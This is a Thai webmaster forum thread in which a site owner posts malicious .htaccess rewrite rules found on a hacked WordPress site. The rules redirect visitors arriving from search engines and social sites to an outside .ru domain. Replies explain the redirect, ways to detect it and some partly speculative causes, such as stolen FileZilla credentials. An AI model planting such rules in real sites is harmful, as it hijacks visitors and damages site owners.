ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

หน้า: [1] 2   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: wp โดนแฮ็กบน .htaccess  (อ่าน 3510 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
มาส่องมาลอง
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 178
ออฟไลน์ ออฟไลน์

กระทู้: 2,280



ดูรายละเอียด เว็บไซต์
« เมื่อ: 10 พฤษภาคม 2012, 20:09:41 »

 Shocked โดนตัวนี้เข้าไปบน WP ไฟล์ .htaccess  เว็บร่วงเลย  wanwan035 เว็บทำเงินด้วยใครช่วยแปลให้หน่อยคร้าบ มันทำไรกับเว็บผมเนี่บ ร้ายแรงมากเลยนะเนี่ย  wanwan007

โค๊ด:
<IfModule mod_rewrite.c>																														
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://ademvoce.ru/herz?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://ademvoce.ru/herz?8 [R=301,L]
</IfModule>

แปลให้ฟังหน่อยครับมันทำอะไรกับเว็บผม   wanwan004 wanwan004 กว่าจะเจอกาน  wanwan007 ออว่าจะถามว่ามันมาทางใหนครับ ใช้บน Cpanel
« แก้ไขครั้งสุดท้าย: 10 พฤษภาคม 2012, 20:12:10 โดย มาส่องมาลอง » บันทึกการเข้า

กำลังเอาใจช่วย adyim.com wanwan015 เว็บนี้เอาไว้ทำอะไรครับSEO
เดี่ยวนี้เรื่องกฎในลายเซ้นถูกละเลยทั้งสูงเกินบ้างพาไป18+บ้างผมคิดมากไปม้าง
Positron
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 289
ออฟไลน์ ออฟไลน์

กระทู้: 1,060



ดูรายละเอียด
« ตอบ #1 เมื่อ: 10 พฤษภาคม 2012, 20:31:05 »

เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้
บันทึกการเข้า
มาส่องมาลอง
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 178
ออฟไลน์ ออฟไลน์

กระทู้: 2,280



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 10 พฤษภาคม 2012, 20:44:21 »

เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้


ต้องลากสอร์บาไปขวาสุดๆๆครับเจอของดี  Tongue
บันทึกการเข้า

กำลังเอาใจช่วย adyim.com wanwan015 เว็บนี้เอาไว้ทำอะไรครับSEO
เดี่ยวนี้เรื่องกฎในลายเซ้นถูกละเลยทั้งสูงเกินบ้างพาไป18+บ้างผมคิดมากไปม้าง
Soisiamdotcom
คนรักเสียว
*

พลังน้ำใจ: 39
ออฟไลน์ ออฟไลน์

กระทู้: 174



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 10 พฤษภาคม 2012, 21:44:45 »

ตัวสคริปมันจะ redirect ไปเว็บ h..p://ademvoce.ru/herz?8 ทุกการเรียกหน้าเว็บคุณครับ
« แก้ไขครั้งสุดท้าย: 10 พฤษภาคม 2012, 23:39:49 โดย Soisiamdotcom » บันทึกการเข้า
BrainFreeze
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 498
ออฟไลน์ ออฟไลน์

กระทู้: 3,887



ดูรายละเอียด เว็บไซต์
« ตอบ #4 เมื่อ: 10 พฤษภาคม 2012, 21:49:47 »

โดนทำ 301 Redirect ครับ

คล้ายกับประกาศว่าย้ายเว็บไซต์
ทิ้งไว้นานๆ เสีย backlink เสีย pr เลยครับ
บันทึกการเข้า

# จัดไป Promo Code ลด 11% : THAISEOBOARD
# hostatom.com |โฮสอะตอม - เว็บโฮสติ้งที่ Webmaster มืออาชีพไว้วางใจ
# Web Hosting | Cloud VPS | Reseller Hosting | Domain Name
# บริการ 24x7 | รับประกันความพอใจยินดีคืนเงิน | Uptime 99.9% | โทร : 0-2107-3466
มาส่องมาลอง
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 178
ออฟไลน์ ออฟไลน์

กระทู้: 2,280



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 10 พฤษภาคม 2012, 21:53:07 »

โดนทำ 301 Redirect ครับ

คล้ายกับประกาศว่าย้ายเว็บไซต์
ทิ้งไว้นานๆ เสีย backlink เสีย pr เลยครับ
ตัวสคริปมันจะ redirect ไปเว็บ http://ademvoce.ru/herz?8 ทุกการเรียกหน้าเว็บคุณครับ


 Shocked ช่ายๆๆครับมันร้ายแรงมากๆๆ มานลบเว็บผมทุกที่เลย แมร่ง  Cry เงินหายไป


 wanwan004 ที่ตั้งกระทู้ก็อยากให้เป็นข้อมูลสำหรับคนที่โดนนะครับ จัด + ผู้ตอบแล้วนะครับ  wanwan008 wanwan017 wanwan017
บันทึกการเข้า

กำลังเอาใจช่วย adyim.com wanwan015 เว็บนี้เอาไว้ทำอะไรครับSEO
เดี่ยวนี้เรื่องกฎในลายเซ้นถูกละเลยทั้งสูงเกินบ้างพาไป18+บ้างผมคิดมากไปม้าง
jira2712
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 175
ออฟไลน์ ออฟไลน์

กระทู้: 1,626



ดูรายละเอียด เว็บไซต์
« ตอบ #6 เมื่อ: 10 พฤษภาคม 2012, 22:04:40 »

ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ  โดยมากับตัว wanwan003
บันทึกการเข้า

หัวน้ำหอม ขายส่งหัวน้ำหอม ขายหัวน้ำหอม หัวเชื้อน้ำหอม ขายส่งหัวเชื้อน้ำหอม zateers.com
หัวน้ำหอม
สารกำจัดเชื้อรา สารกำจัดโรคพืช สารป้องกันโรคพืช zateers.com/greens/
สารกำจัดเชื้อรา
nakprat
คนรักเสียว
*

พลังน้ำใจ: 9
ออฟไลน์ ออฟไลน์

กระทู้: 155



ดูรายละเอียด
« ตอบ #7 เมื่อ: 10 พฤษภาคม 2012, 22:09:30 »

น่ากลัวมากครับ  wanwan009
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ
บันทึกการเข้า
m_manthai
สมุนแก๊งเสียว
*

พลังน้ำใจ: 66
ออฟไลน์ ออฟไลน์

กระทู้: 957



ดูรายละเอียด
« ตอบ #8 เมื่อ: 10 พฤษภาคม 2012, 22:09:44 »

ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ  โดยมากับตัว wanwan003

หมายถึงโปรแกรม file zilla มักจะเป็นสาเหตหรอท่าน

แล้วทำไมหลายๆคนจึงแนะนำตัวนี้หว่า ทั้งๆที่ผมมีตัวอื่นอยู่แล้ว แต่มาใช้ตัวนี้ตามคำแนะนำของคนในเวปนี้
บันทึกการเข้า
Positron
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 289
ออฟไลน์ ออฟไลน์

กระทู้: 1,060



ดูรายละเอียด
« ตอบ #9 เมื่อ: 10 พฤษภาคม 2012, 22:42:25 »

เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้


ต้องลากสอร์บาไปขวาสุดๆๆครับเจอของดี  Tongue

อ๋อ ผมสกอบาร์ในกรอบนั้นไม่ได้อะครับ ก็เลยนึกว่ามีแค่นั้น  Embarrassed
บันทึกการเข้า
holidaytours
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 291
ออฟไลน์ ออฟไลน์

กระทู้: 7,581



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 10 พฤษภาคม 2012, 23:02:44 »

น่ากลัวมากครับ  wanwan009
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ
อาจจะเป็นที่โฮสต์ก็ได้นะท่าน
เห็นมีเพื่อนในนี้เคยบอกไว้นะครับ
 wanwan009
บันทึกการเข้า

topsaler
คนรักเสียว
*

พลังน้ำใจ: 5
ออฟไลน์ ออฟไลน์

กระทู้: 112



ดูรายละเอียด
« ตอบ #11 เมื่อ: 10 พฤษภาคม 2012, 23:18:41 »

จากสคริป มันจะ redirect เว็บอื่น ถ้ามีTraffic มาจาก search engin
อย่างเราเข้าตรงๆมันจะไม่ redirect ต้องเข้าผ่าน search engin แล้วเข้าเกิน
1ครั้งมันก้อไม่redirectอีก คนที่ไม่สังเกตุผมว่ามีเยอะนะ อีกอย่างมันติดได้หลาย file
ไม่เฉพาะ .htaccess ของผมล่าสุด ติดใน file function.php เล่นเอาเสียหลักไป
พักนึง traffic เยอะแต่ order หาย wanwan031

สำหรับคนโดนไม่อยากปวดกะบานแก้เอง โยนให้ Support scanให้เลยครับ ไม่เกินชั่วโมง
เสร็จ และอัฟเดท wp เวอร์ชั่นล่าสุดด้วย เพราะที่โดนมีสาเหตุมากจากเวอร์ชั่นเก่ามีช่องโหว่ครับ

วิธีตรวจสอบง่ายๆ พิมพ์ site:เว็บของท่าน ในช่อง search engin
แล้วคลิกที่ลิงค์ ถ้า redirect ไปเว็บอื่น
แสดงว่าท่านโดนเข้าแล้ว  wanwan016
บันทึกการเข้า
jira2712
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 175
ออฟไลน์ ออฟไลน์

กระทู้: 1,626



ดูรายละเอียด เว็บไซต์
« ตอบ #12 เมื่อ: 10 พฤษภาคม 2012, 23:26:31 »

ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ  โดยมากับตัว wanwan003

หมายถึงโปรแกรม file zilla มักจะเป็นสาเหตหรอท่าน

แล้วทำไมหลายๆคนจึงแนะนำตัวนี้หว่า ทั้งๆที่ผมมีตัวอื่นอยู่แล้ว แต่มาใช้ตัวนี้ตามคำแนะนำของคนในเวปนี้
file zilla ไว้สำหร้บแก้นะครับ แต่ มันเป็น open source
บันทึกการเข้า

หัวน้ำหอม ขายส่งหัวน้ำหอม ขายหัวน้ำหอม หัวเชื้อน้ำหอม ขายส่งหัวเชื้อน้ำหอม zateers.com
หัวน้ำหอม
สารกำจัดเชื้อรา สารกำจัดโรคพืช สารป้องกันโรคพืช zateers.com/greens/
สารกำจัดเชื้อรา
Innovation
สมุนแก๊งเสียว
*

พลังน้ำใจ: 114
ออฟไลน์ ออฟไลน์

กระทู้: 936



ดูรายละเอียด
« ตอบ #13 เมื่อ: 10 พฤษภาคม 2012, 23:40:53 »

วิธีแก้ไขสำหรับผู้ใช้ hostgator แบบได้ผลรวดเร็วทันใจ แม่นยำเที่ยงตรง ในกรณีแบบนี้ คือ แชทคุยกับ support ให้เค้าแก้ให้เรา
ไม่เกิน 3 ชม. เรียบร้อย สบายใจ กินได้ นอนหลับ  wanwan002
บันทึกการเข้า
Soisiamdotcom
คนรักเสียว
*

พลังน้ำใจ: 39
ออฟไลน์ ออฟไลน์

กระทู้: 174



ดูรายละเอียด เว็บไซต์
« ตอบ #14 เมื่อ: 10 พฤษภาคม 2012, 23:43:09 »

น่ากลัวมากครับ  wanwan009
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

อย่างคำตอบด้านบนสาเหตุส่วนใหญ่จะมาจาก file zilla ถ้าจะให้ดีใช้antivirus avast ครับเพราะว่าตัวนี้สามารถสแกนแม้แต่ไฟล์ที่ถูกเข้ารหัส ปลอดไวรัสชัวร์ ขณะอัพโหลดขึ้นโฮส
บันทึกการเข้า
KenjiroAPI
ก๊วนเสียว
*

พลังน้ำใจ: 65
ออฟไลน์ ออฟไลน์

กระทู้: 332



ดูรายละเอียด
« ตอบ #15 เมื่อ: 10 พฤษภาคม 2012, 23:47:07 »

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า Tongue
บันทึกการเข้า
try2hack
Newbie
*

พลังน้ำใจ: 3
ออฟไลน์ ออฟไลน์

กระทู้: 64



ดูรายละเอียด เว็บไซต์
« ตอบ #16 เมื่อ: 11 พฤษภาคม 2012, 00:03:07 »

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า Tongue


ไม่ได้โทษ Filezilla ครับ เขสไห้ใช้ Filezilla FTP เข้าไปแก้ไห้เป็นปรกติ เพราะว่าตัวโปรแกรมมันฟรีครบั อ่านดีๆ
บันทึกการเข้า

KenjiroAPI
ก๊วนเสียว
*

พลังน้ำใจ: 65
ออฟไลน์ ออฟไลน์

กระทู้: 332



ดูรายละเอียด
« ตอบ #17 เมื่อ: 11 พฤษภาคม 2012, 03:39:06 »

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า Tongue


ไม่ได้โทษ Filezilla ครับ เขสไห้ใช้ Filezilla FTP เข้าไปแก้ไห้เป็นปรกติ เพราะว่าตัวโปรแกรมมันฟรีครบั อ่านดีๆ

ผมไม่ได้หมายถึงคุณครับ ผมหมายถึงโพสต์ข้างบนของผม

น่ากลัวมากครับ  wanwan009
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

อย่างคำตอบด้านบนสาเหตุส่วนใหญ่จะมาจาก file zilla ถ้าจะให้ดีใช้antivirus avast ครับเพราะว่าตัวนี้สามารถสแกนแม้แต่ไฟล์ที่ถูกเข้ารหัส ปลอดไวรัสชัวร์ ขณะอัพโหลดขึ้นโฮส
บันทึกการเข้า
siriyot00
สมุนแก๊งเสียว
*

พลังน้ำใจ: 34
ออฟไลน์ ออฟไลน์

กระทู้: 760



ดูรายละเอียด
« ตอบ #18 เมื่อ: 11 พฤษภาคม 2012, 03:43:18 »

ระวังโดนอีกรอบนะ มีรุ่นพี่ที่เป็น hacker อะ เขาบอกว่า เวลา hack เสร็จ เขาจะทำทางเข้าอะไรไว้ก็ไม่รู้ หรือผมมั่วหวา  Sad
บันทึกการเข้า

Thaipromoteboard.com
cerberuz
ก๊วนเสียว
*

พลังน้ำใจ: 14
ออฟไลน์ ออฟไลน์

กระทู้: 269



ดูรายละเอียด
« ตอบ #19 เมื่อ: 11 พฤษภาคม 2012, 06:55:14 »

จากประสบการณ์ตรงที่ใช้ filezilla  เวลาคอมติดไว้รัสมันก็จะอ่านไฟล์ xml จาก filezilla  นี่แหละแล้วเข้าไปปล่อยไฟล์hack  FTP ไหนที่ไม่ได้เซฟไว้ใน filezilla  จะรอด แต่เว็บไหนที่มีลิสอยู่ในโปรแกรม filezilla  ก็โดนยกโฮสตอนนั้นโดนไปสามโฮส  wanwan031
บันทึกการเข้า

หน้า: [1] 2   ขึ้นบน
พิมพ์